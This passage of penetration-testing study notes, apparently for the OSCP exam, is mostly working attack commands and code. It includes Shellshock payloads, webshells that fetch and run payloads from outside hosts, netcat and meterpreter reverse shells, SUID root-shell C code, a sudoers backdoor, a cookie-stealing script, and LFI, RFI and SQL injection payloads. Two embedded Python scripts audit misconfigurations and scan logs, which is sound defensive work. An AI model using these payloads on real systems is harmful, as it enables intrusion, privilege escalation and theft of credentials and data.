  `nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip`

  - `git clone https://github.com/nccgroup/shocker`

  `./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose`

  - Shellshock SSH Forced Command
  Check for a forced command by enabling all debug output with ssh; a vulnerable bash executes the trailing command from the environment before the forced command runs

    ssh -vvv
    ssh -i noob noob@$ip '() { :;}; /bin/bash'

  - cat file (view file contents) through a vulnerable CGI script; the `\$(</etc/passwd)` is evaluated by the target's bash and echoed into the response

    echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () {:;}; echo \$(</etc/passwd)\r\nHost: $ip\r\nConnection: close\r\n\r\n" | nc $ip 80

- Serving files over HTTP

  - Run a basic Ruby HTTP server from the current directory
  `ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"`

  - Run a basic PHP HTTP server
  `php -S $ip:80`

- Creating a wget VB Script on Windows:
https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt

- Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell.
The following script can be copied and pasted into a basic Windows reverse shell and used to transfer files from a web server (the `timeout 1` commands are required after each new line so the pasted input is not swallowed by the shell):

    echo Set args = Wscript.Arguments >> webdl.vbs
    timeout 1
    echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
    timeout 1
    echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
    timeout 1
    echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
    timeout 1
    echo xHttp.Open "GET", Url, False >> webdl.vbs
    timeout 1
    echo xHttp.Send >> webdl.vbs
    timeout 1
    echo with bStrm >> webdl.vbs
    timeout 1
    echo .type = 1 ' >> webdl.vbs
    timeout 1
    echo .open >> webdl.vbs
    timeout 1
    echo .write xHttp.responseBody >> webdl.vbs
    timeout 1
    echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
    timeout 1
    echo end with >> webdl.vbs

The file can be run using the following syntax (cscript.exe lives in System32 and is on the PATH):

`cscript.exe webdl.vbs`

- Mounting File Shares

  - Mount NFS share to /mnt/nfs
  `mount $ip:/vol/share /mnt/nfs`

- HTTP PUT (uploads a local file to the web server; only works where the PUT method is enabled and the target directory is writable)
`nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php'`

- Uploading Files
-------------------------------------------------------------------------------------------------------------

- SCP

`scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2`

`scp localfile username@$ip:~/Folder/`

`scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~`

- WebDAV with Davtest - Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor

`davtest -move
-sendbd auto -url http://$ip`

https://github.com/cldrn/davtest

You can also upload a file using the PUT method with the curl command:

`curl -T 'leetshellz.txt' 'http://$ip'`

And rename it to an executable file using the MOVE method with the curl command (upload as .txt first because .php uploads are often blocked while MOVE is not):

`curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`

- Upload shell using limited PHP shell cmd
use the webshell to download and execute the meterpreter payload

    curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil" http://$ip/files/sh.php
    curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php
    curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php

- TFTP (serve nc.exe from Kali; `-i` on the Windows side selects binary transfer mode)

    mkdir /tftp
    atftpd --daemon --port 69 /tftp
    cp /usr/share/windows-binaries/nc.exe /tftp/
    EX. FROM WINDOWS HOST:
    C:\Users\Offsec>tftp -i $ip get nc.exe

- FTP
`apt-get update && apt-get install pure-ftpd`

    #!/bin/bash
    groupadd ftpgroup
    useradd -g ftpgroup -d /dev/null -s /etc ftpuser
    pure-pw useradd offsec -u ftpuser -d /ftphome
    pure-pw mkdb
    cd /etc/pure-ftpd/auth/
    ln -s ../conf/PureDB 60pdb
    mkdir -p /ftphome
    chown -R ftpuser:ftpgroup /ftphome/

    /etc/init.d/pure-ftpd restart

(the system account `ftpuser` gets `/etc` as its "shell" so it cannot log in; only pure-ftpd's virtual user `offsec` is meant to authenticate)

- Packing Files
-------------------------------------------------------------------------------------------------------------

- Ultimate Packer for eXecutables
`upx -9 nc.exe`

- exe2bat - Converts EXE to a text file that can be copied and pasted
`locate exe2bat`
`wine exe2bat.exe nc.exe nc.txt`

- Veil - Evasion Framework -
https://github.com/Veil-Framework/Veil-Evasion
`apt-get -y install git`
`git clone https://github.com/Veil-Framework/Veil-Evasion.git`
`cd Veil-Evasion/`
`cd setup`
`./setup.sh -c`

Privilege Escalation
==================================================================================================================

*Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.*

- Linux Privilege Escalation
------------------------------------------------------------------------------------------------------------------------

- De facto Linux Privilege Escalation Guide - A much more thorough guide for Linux enumeration:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

- Try the obvious - Maybe the user is root or can sudo to root:

`id`

`sudo su`

- Here are the commands I have learned to use to perform Linux enumeration and privilege escalation:

What users can log in to this box (do they use their username as their password)?:

`grep -vE "nologin|false" /etc/passwd`

What kernel version are we using? Do we have any kernel exploits for this version?

`uname -a`

`searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"`

What applications have active connections (listening TCP/UDP sockets and the process that owns them)?:

`netstat -tulpn`

What services are running as root?:

`ps aux | grep root`

What files run as root / SUID / SGID?:

    find / -perm /2000 -user root -type f -print   # SGID files owned by root ("-perm +2000" is no longer accepted by GNU find; "/" means "any of these bits")
    find / -perm -1000 -type d 2>/dev/null         # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
  ```bash
  find / -perm -g=s -type f 2>/dev/null                       # SGID (chmod 2000) - runs as the group, not the user who started it.
  find / -perm -u=s -type f 2>/dev/null                       # SUID (chmod 4000) - runs as the owner, not the user who started it.
  find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null   # SGID or SUID
  for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
  find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
  ```

  What folders are world-writable?

  ```bash
  find / -writable -type d 2>/dev/null                         # world-writable folders
  find / -perm -222 -type d 2>/dev/null                        # world-writable folders
  find / -perm -o=w -type d 2>/dev/null                        # world-writable folders
  find / -perm -o=x -type d 2>/dev/null                        # world-executable folders
  find / \( -perm -o=w -a -perm -o=x \) -type d 2>/dev/null    # world-writable & executable folders
  ```

- There are a few scripts that can automate the Linux enumeration process:

  - Google is my favorite Linux kernel exploitation search tool. Many of these automated checkers are missing important kernel exploits, which can create a very frustrating blind spot during your OSCP course.

  - LinuxPrivChecker.py - My favorite automated Linux priv enumeration checker -

    [https://www.securitysift.com/download/linuxprivchecker.py](https://www.securitysift.com/download/linuxprivchecker.py)

  - LinEnum - (Recently Updated)

    [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)

  - linux-exploit-suggester (Recently Updated)

    [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)

  - Highon.coffee Linux Local Enum - Great enumeration script!
    `wget https://highon.coffee/downloads/linux-local-enum.sh`

  - Linux Privilege Exploit Suggester (Old, has not been updated in years)

    [https://github.com/PenturaLabs/Linux_Exploit_Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester)

  - Linux post exploitation enumeration and exploit checking tools

    [https://github.com/reider-roque/linpostexp](https://github.com/reider-roque/linpostexp)

Handy Kernel Exploits

- CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)

  [https://www.exploit-db.com/exploits/14814/](https://www.exploit-db.com/exploits/14814/)

  ```
  wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814
  $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
  $ ./i-can-haz-modharden
  [+] launching root shell!
  # id
  uid=0(root) gid=0(root)
  ```

- CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
  [https://www.exploit-db.com/exploits/15285/](https://www.exploit-db.com/exploits/15285/)

- CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
  [https://git.zx2c4.com/CVE-2012-0056/about/](https://git.zx2c4.com/CVE-2012-0056/about/)
  Linux CVE 2012-0056

  ```
  wget -O exploit.c http://www.exploit-db.com/download/18411
  gcc -o mempodipper exploit.c
  ./mempodipper
  ```

- CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
  [https://dirtycow.ninja/](https://dirtycow.ninja/)
  First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016

- Run a command as a user other than root

  `sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf`

- Add a user or change a password

  ```bash
  /usr/sbin/useradd -p $(openssl passwd -1 thePassword) haxzor
  echo thePassword | passwd haxzor --stdin
  ```

- Local Privilege Escalation Exploit in Linux

  - **SUID** (**S**et owner **U**ser **ID** up on execution)
    Often SUID C binary files are required to spawn a shell as a superuser; you can update the UID / GID and shell as required.

    Below are some quick copy-and-paste examples for various shells:

    SUID C shell for /bin/bash

    ```c
    #define _GNU_SOURCE
    #include <stdlib.h>
    #include <unistd.h>

    int main(void){
        setresuid(0, 0, 0);
        system("/bin/bash");
    }
    ```

    SUID C shell for /bin/sh

    ```c
    #define _GNU_SOURCE
    #include <stdlib.h>
    #include <unistd.h>

    int main(void){
        setresuid(0, 0, 0);
        system("/bin/sh");
    }
    ```

    Building the SUID shell binary
    `gcc -o suid suid.c`
    For 32 bit:
    `gcc -m32 -o suid suid.c`

  - Create and compile an SUID from a limited shell (no file transfer)

    ```bash
    printf '#include <stdlib.h>\n#include <unistd.h>\nint main(void){\nsetgid(0);\nsetuid(0);\nsystem("/bin/sh");\n}\n' > privsc.c
    gcc privsc.c -o privsc
    ```

  - Handy command if you can get a root user to run it. Add the www-data user to the root sudo group with no password requirement:

    `echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update`

  - You may find a command is being executed by the root user; you may be able to modify the system PATH environment variable to execute your command instead. In the example below, ssh is replaced with a reverse shell script connecting to 10.10.10.1 on port 4444.
    ```bash
    export PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
    echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
    chmod +x /tmp/ssh
    ```

- SearchSploit

  ```
  searchsploit apache 2.2
  searchsploit "Linux Kernel"
  searchsploit linux 2.6 | grep -i ubuntu | grep local
  searchsploit slmail
  ```

- Kernel Exploit Suggestions for Kernel Version 3.0.0

  `/usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0`

- Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!***

  [*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/)

- Collect root password

  `cat /etc/shadow | grep root`

- Find and display the proof.txt or flag.txt - LOOT!

  ``cat `find / -name proof.txt -print` ``

- Windows Privilege Escalation
--------------------------------------------------------------------------------------------------------------------------

- Windows Privilege Escalation resource
  http://www.fuzzysecurity.com/tutorials/16.html

- Metasploit Meterpreter Privilege Escalation Guide
  https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

- Try the obvious - Maybe the user is SYSTEM or is already part of the Administrators group:

  `whoami`

  `net user "%username%"`

- Try the getsystem command using meterpreter - rarely works but is worth a try.

  `meterpreter > getsystem`

- No File Upload Required Windows Privilege Escalation Basic Information Gathering (based on the Fuzzy Security tutorial and windows_privesc_check.py).
  Copy and paste the following contents into your remote Windows shell in Kali to generate a quick report:

  ```
  @echo --------- BASIC WINDOWS RECON --------- > report.txt
  timeout 1
  net config Workstation >> report.txt
  timeout 1
  systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt
  timeout 1
  hostname >> report.txt
  timeout 1
  net users >> report.txt
  timeout 1
  ipconfig /all >> report.txt
  timeout 1
  route print >> report.txt
  timeout 1
  arp -a >> report.txt
  timeout 1
  netstat -ano >> report.txt
  timeout 1
  netsh firewall show state >> report.txt
  timeout 1
  netsh firewall show config >> report.txt
  timeout 1
  schtasks /query /fo LIST /v >> report.txt
  timeout 1
  tasklist /SVC >> report.txt
  timeout 1
  net start >> report.txt
  timeout 1
  DRIVERQUERY >> report.txt
  timeout 1
  reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
  timeout 1
  reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
  timeout 1
  dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt
  timeout 1
  findstr /si password *.xml *.ini *.txt >> report.txt
  timeout 1
  reg query HKLM /f password /t REG_SZ /s >> report.txt
  timeout 1
  reg query HKCU /f password /t REG_SZ /s >> report.txt
  timeout 1
  dir "C:\" >> report.txt
  timeout 1
  dir "C:\Program Files\" >> report.txt
  timeout 1
  dir "C:\Program Files (x86)\" >> report.txt
  timeout 1
  dir "C:\Users\" >> report.txt
  timeout 1
  dir "C:\Users\Public\" >> report.txt
  timeout 1
  echo REPORT COMPLETE!
  ```
- Windows Server 2003 and IIS 6.0 WebDAV Exploiting
  http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html

  `msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt`

  ```
  cadaver http://$ip
  dav:/> put aspshell.txt
  Uploading aspshell.txt to `/aspshell.txt':
  Progress: [=============================>] 100.0% of 38468 bytes succeeded.
  dav:/> copy aspshell.txt aspshell3.asp;.txt
  Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.
  dav:/> exit
  ```

  ```
  msf > use exploit/multi/handler
  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  msf exploit(handler) > set LHOST 1.2.3.4
  msf exploit(handler) > set LPORT 443
  msf exploit(handler) > set ExitOnSession false
  msf exploit(handler) > exploit -j
  ```

  `curl http://$ip/aspshell3.asp;.txt`

  ```
  [*] Started reverse TCP handler on 1.2.3.4:443
  [*] Starting the payload handler...
  [*] Sending stage (957487 bytes) to 1.2.3.5
  [*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
  ```

- Windows privilege escalation exploits are often written in Python, so it is necessary to compile them into an executable using pyinstaller.py and upload them to the remote server.
  ```
  pip install pyinstaller
  wget -O exploit.py http://www.exploit-db.com/download/31853
  python pyinstaller.py --onefile exploit.py
  ```

- Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:

  https://www.exploit-db.com/exploits/6705/

  https://github.com/Re4son/Churrasco

  ```
  c:\Inetpub>churrasco
  churrasco
  /churrasco/-->Usage: Churrasco.exe [-d] "command to run"

  c:\Inetpub>churrasco -d "net user /add "
  c:\Inetpub>churrasco -d "net localgroup administrators /add"
  c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" /ADD"
  ```

- Windows MS11-080 - http://www.exploit-db.com/exploits/18176/

  ```
  python pyinstaller.py --onefile ms11-080.py
  ms11-080.exe -O XP
  ```

- PowerShell Exploits - You may find that some Windows privilege escalation exploits are written in PowerShell. You may not have an interactive shell that allows you to enter the PowerShell prompt. Once the PowerShell script is uploaded to the server, here is a quick one-liner to run a PowerShell command from a basic (cmd.exe) shell:

  MS16-032 https://www.exploit-db.com/exploits/39719/

  `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"`

- PowerShell Priv Escalation Tools
  https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

- Windows Run As - Switching users in Linux is trivial with the `su` command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.

  - Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have their username and password. The following example creates a reverse shell from a Windows server to our Kali box using netcat for Windows and PsExec (on a 64-bit system).

    ```
    C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"

    PsExec v2.2 - Execute processes remotely
    Copyright (C) 2001-2016 Mark Russinovich
    Sysinternals - www.sysinternals.com
    ```

  - Runas.exe is a handy Windows tool that allows you to run a program as another user so long as you know their password. The following example creates a reverse shell from a Windows server to our Kali box using netcat for Windows and Runas.exe:

    ```
    C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
    Enter the password for Test:
    Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
    ```

  - PowerShell can also be used to launch a process as another user. The following simple PowerShell script will run a reverse shell as the specified username and password.

    ```powershell
    $username = ''
    $password = ''
    $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
    $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
    Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public
    ```

    Next run this script using powershell.exe:

    `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"`

- Windows Service Configuration Viewer - Check for misconfigurations in services that can lead to privilege escalation. You can replace the executable with your own and have Windows execute whatever code you want as the privileged user.
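  The defender-side counterpart to the checks in this section, as an added example (not code from the original notes): it parses the two `reg query ... AlwaysInstallElevated` results that the recon script above writes into report.txt, and `icacls` output in the layout shown below, and flags the conditions that make each one exploitable. All input is constructed; the principal and rights sets are assumptions, not an exhaustive list.

  ```python
  """Audit two Windows privilege-escalation misconfigurations from this section:
  AlwaysInstallElevated enabled in BOTH hives (parsed from the 'reg query' lines
  in report.txt) and a service binary whose ACL lets a low-privileged principal
  modify it (parsed from 'icacls' output). Added example; inputs are constructed."""
  import re

  # Constructed excerpt of report.txt, in the format 'reg query' prints.
  REPORT = r"""
  HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
      AlwaysInstallElevated    REG_DWORD    0x1

  HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
      AlwaysInstallElevated    REG_DWORD    0x1
  """

  # Constructed icacls output, modelled on the scsiaccess.exe listing in this
  # section: the file name on its own line, then one ACE per line.
  ICACLS = r"""
  scsiaccess.exe
      NT AUTHORITY\SYSTEM:(I)(F)
      BUILTIN\Administrators:(I)(F)
      BUILTIN\Users:(I)(RX)
      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
      Everyone:(I)(F)
  """

  # Principals that must never be able to modify a service binary (assumed set).
  LOW_PRIV = {"everyone", "builtin\\users",
              "authenticated users", "nt authority\\authenticated users"}
  # icacls rights that change the file: full, modify, write, plus the specific
  # rights for writing data, appending, deleting or changing the ACL/owner.
  WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "D", "DC", "WDAC", "WO"}

  HIVE_RE = re.compile(r"^(HKEY_LOCAL_MACHINE|HKEY_CURRENT_USER)\\")
  VALUE_RE = re.compile(r"^AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)$")
  ACE_RE = re.compile(r"^(.+?):((?:\([^()]*\))+)$")   # PRINCIPAL:(flags)(rights)


  def always_install_elevated(report: str) -> bool:
      """True only when the policy is 0x1 under BOTH HKLM and HKCU, which is the
      condition under which an .msi package is installed as SYSTEM."""
      enabled = set()
      hive = None
      for line in report.splitlines():
          line = line.strip()
          if (m := HIVE_RE.match(line)):
              hive = m.group(1)
          elif hive and (m := VALUE_RE.match(line)) and int(m.group(1), 16) == 1:
              enabled.add(hive)
      return {"HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER"} <= enabled


  def writable_by_low_priv(icacls_output: str) -> dict:
      """Map each file name to the low-privileged principals that hold write
      rights on it. A line without an ACE starts a new file block."""
      findings = {}
      current = None
      for raw in icacls_output.splitlines():
          line = raw.strip()
          if not line:
              continue
          m = ACE_RE.match(line)
          if not m:
              current = line
              continue
          principal = m.group(1).strip()
          # Split every parenthesised group into tokens; (I) is inheritance,
          # (F)/(RX)/... or comma-separated specific rights follow it.
          tokens = {t for grp in re.findall(r"\(([^()]*)\)", m.group(2))
                    for t in grp.split(",")}
          if principal.lower() in LOW_PRIV and tokens & WRITE_RIGHTS:
              findings.setdefault(current, []).append(principal)
      return findings


  if __name__ == "__main__":
      print("AlwaysInstallElevated exploitable:", always_install_elevated(REPORT))
      print("Service binaries writable by low-privileged users:",
            writable_by_low_priv(ICACLS))
  ```

  Real `icacls` output puts the first ACE on the same line as the file name; this parser assumes the one-per-line layout used in this section.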
  ```
  icacls scsiaccess.exe

  scsiaccess.exe
  NT AUTHORITY\SYSTEM:(I)(F)
  BUILTIN\Administrators:(I)(F)
  BUILTIN\Users:(I)(RX)
  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
  Everyone:(I)(F)
  ```

- Compile a custom add-user command in Windows using C

  ```
  root@kali:~# cat useradd.c
  #include <stdlib.h> /* system, NULL, EXIT_FAILURE */
  int main ()
  {
      int i;
      i=system ("net localgroup administrators low /add");
      return 0;
  }
  ```

  `i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c`

- Group Policy Preferences (GPP)
  A common useful misconfiguration found in modern domain environments is unprotected Windows GPP settings files.

  - Map the domain controller SYSVOL share

    `net use z: \\dc01\SYSVOL`

  - Find the GPP file: Groups.xml

    `dir /s Groups.xml`

  - Review the contents for passwords

    `type Groups.xml`

  - Decrypt using gpp-decrypt

    `gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB`

- Find and display the proof.txt or flag.txt - get the loot!
  `meterpreter > run post/windows/gather/win_privs`
  `cd\ & dir /b /s proof.txt`
  `type c:\pathto\proof.txt`

Client, Web and Password Attacks
==============================================================================================================================

- Client Attacks
------------------------------------------------------------------------------------------------------------

- MS12-037 - Internet Explorer 8 Fixed Col Span ID
  `wget -O exploit.html`

  `service apache2 start`

- Java Signed Jar client side attack
  `echo '' > /var/www/html/java.html`
  User must hit run on the popup that occurs.

- Linux Client Shells
  [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)

- Setting up the Client Side Exploit

- Swapping Out the Shellcode

- Injecting a Backdoor Shell into Plink.exe
  `backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip -P 4444 -s reverse_shell_tcp`

- Web Attacks
---------------------------------------------------------------------------------------------------------

- Web Shag Web Application Vulnerability Assessment Platform
  `webshag-gui`

- Web Shells
  [*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells)
  `ls -l /usr/share/webshells/`

- Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
  `weevely generate s3cr3t`
  `weevely http://$ip/weevely.php s3cr3t`

- Java Signed Applet Attack

- HTTP / HTTPS Webserver Enumeration

  - OWASP DirBuster

  - `nikto -h $ip`

- Essential Iceweasel Add-ons
  Cookies Manager
  https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
  Tamper Data
  https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

- Cross Site Scripting (XSS)
  XSS can have significant impacts, such as cookie stealing and authentication bypass, redirecting the victim's browser to a malicious HTML page, and more.

- Browser Redirection and IFRAME Injection
  ```html

  ```

- Stealing Cookies and Session Information
  ```javascript
  new Image().src="http://$ip/bogus.php?output="+document.cookie;
  ```
  `nc -nlvp 80`

- File Inclusion Vulnerabilities
-----------------------------------------------------------------------------------------------------------------------------

- Local (LFI) and remote (RFI) file inclusion vulnerabilities are commonly found in poorly written PHP code.

- fimap - There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI):
  [*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap)

- Gaining a shell from phpinfo()
  fimap + phpinfo() Exploit - If a phpinfo() file is present, it's usually possible to get a shell; if you don't know the location of the phpinfo file, fimap can probe for it, or you could use a tool like OWASP DirBuster.

- For Local File Inclusions look for the include() function in PHP code.
  ```php
  include("lang/".$_COOKIE['lang']);
  include($_GET['page'].".php");
  ```

- LFI - Encode and decode a file using base64
  ```bash
  curl -s \
    "http://$ip/?page=php://filter/convert.base64-encode/resource=index" \
    | grep -e '[^\ ]\{40,\}' | base64 -d
  ```

- LFI - Download file with base64 encoding
  `http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php`

- LFI Linux files:
  ```
  /etc/issue
  /proc/version
  /etc/profile
  /etc/passwd
  /etc/shadow
  /root/.bash_history
  /var/log/dmesg
  /var/mail/root
  /var/spool/cron/crontabs/root
  ```

- LFI Windows files:
  ```
  %SYSTEMROOT%\repair\system
  %SYSTEMROOT%\repair\SAM
  %WINDIR%\win.ini
  %SYSTEMDRIVE%\boot.ini
  %WINDIR%\Panther\sysprep.inf
  %WINDIR%\system32\config\AppEvent.Evt
  ```

- LFI OSX files:
  ```
  /etc/fstab
  /etc/master.passwd
  /etc/resolv.conf
  /etc/sudoers
  /etc/sysctl.conf
  ```

- LFI - Download passwords file
  `http://$ip/index.php?page=/etc/passwd`
  `http://$ip/index.php?file=../../../../etc/passwd`

- LFI - Download passwords file with filter evasion
  `http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd`

- Local File Inclusion - In versions of PHP below 5.3 we can terminate with a null byte
  `GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00`

- Contaminating Log Files ``

- For a Remote File Inclusion look for PHP code that is not sanitized and passed to the PHP include function; the php.ini file must also be configured to allow remote files:

  */etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on"

  `include($_REQUEST["file"].".php");`

- Remote File Inclusion

  `http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt`

  ``

- Database Vulnerabilities
----------------------------------------------------------------------------------------------------------------------

- Playing with SQL Syntax
  A great tool I have found for playing with SQL syntax for a variety of database types (MSSQL Server, MySQL, PostgreSQL, Oracle) is SQL Fiddle:

  http://sqlfiddle.com

  Another site is rextester.com:

  http://rextester.com/l/mysql_online_compiler

- Detecting SQL Injection Vulnerabilities.

  Most modern automated scanner tools use time delay techniques to detect SQL injection vulnerabilities. This method can tell you if a SQL injection vulnerability is present even if it is a "blind" SQL injection vulnerability that does not provide any data back. You know your SQL injection is working when the server takes a LOooooong time to respond. I have added a line comment at the end of each injection statement just in case there is additional SQL code after the injection point.
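  From the defender's side, the same payloads are what a log review should catch. The scanner below is an added example (not code from the original notes) that decodes each request and flags the time-delay, boolean and UNION SQL injection patterns listed in this section, together with the php://filter, traversal, null-byte and remote-URL inclusion patterns from the File Inclusion section above. The access-log lines and the rule set are constructed for the example and are not exhaustive.

  ```python
  """Flag requests carrying the SQL injection and file inclusion payloads
  catalogued in these sections. Added example; log lines are constructed."""
  import re
  from urllib.parse import unquote_plus

  # Rule name -> pattern, applied to the URL-decoded, lower-cased request.
  RULES = {
      "sqli-time-mssql": re.compile(r"waitfor\s+delay\s+'"),
      "sqli-time-mysql": re.compile(r"\bsleep\s*\(\s*\d+\s*\)"),
      "sqli-time-pgsql": re.compile(r"\bpg_sleep\s*\("),
      "sqli-boolean":    re.compile(r"'\s*or\s+1\s*=\s*1"),
      "sqli-union":      re.compile(r"\bunion\s+(?:all\s+)?select\b"),
      "sqli-outfile":    re.compile(r"\binto\s+outfile\b"),
      "lfi-php-filter":  re.compile(r"php://filter/"),
      "lfi-traversal":   re.compile(r"(?:\.\./){2,}|/etc/passwd|/etc/shadow|/windows/system32/"),
      "lfi-null-byte":   re.compile("\x00"),
      # Noisy on legitimate redirect parameters; treat hits as review items.
      "rfi-remote-url":  re.compile(r"=(?:https?|ftp)://"),
  }

  # Request field of an Apache combined-format log line: "METHOD /path?query HTTP/x.y"
  REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

  # Constructed log: one benign request, then payloads taken from these sections.
  LOG = r"""
  10.0.0.5 - - [25/Sep/2017:13:10:55 -0700] "GET /comment.php?id=738 HTTP/1.1" 200 1043
  10.0.0.5 - - [25/Sep/2017:13:11:02 -0700] "GET /comment.php?id=738%20union%20all%20select%201,2,3,4,@@version,6 HTTP/1.1" 200 1102
  10.0.0.5 - - [25/Sep/2017:13:11:09 -0700] "GET /products.php?name=Test';%20WAITFOR%20DELAY%20'00:00:30';%20-- HTTP/1.1" 200 88
  10.0.0.5 - - [25/Sep/2017:13:11:15 -0700] "GET /index.php?page=php://filter/convert.base64-encode/resource=admin HTTP/1.1" 200 4021
  10.0.0.5 - - [25/Sep/2017:13:11:20 -0700] "GET /index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1670
  10.0.0.5 - - [25/Sep/2017:13:11:24 -0700] "GET /login.php?name=wronguser'%20or%201=1%20LIMIT%201;-- HTTP/1.1" 302 0
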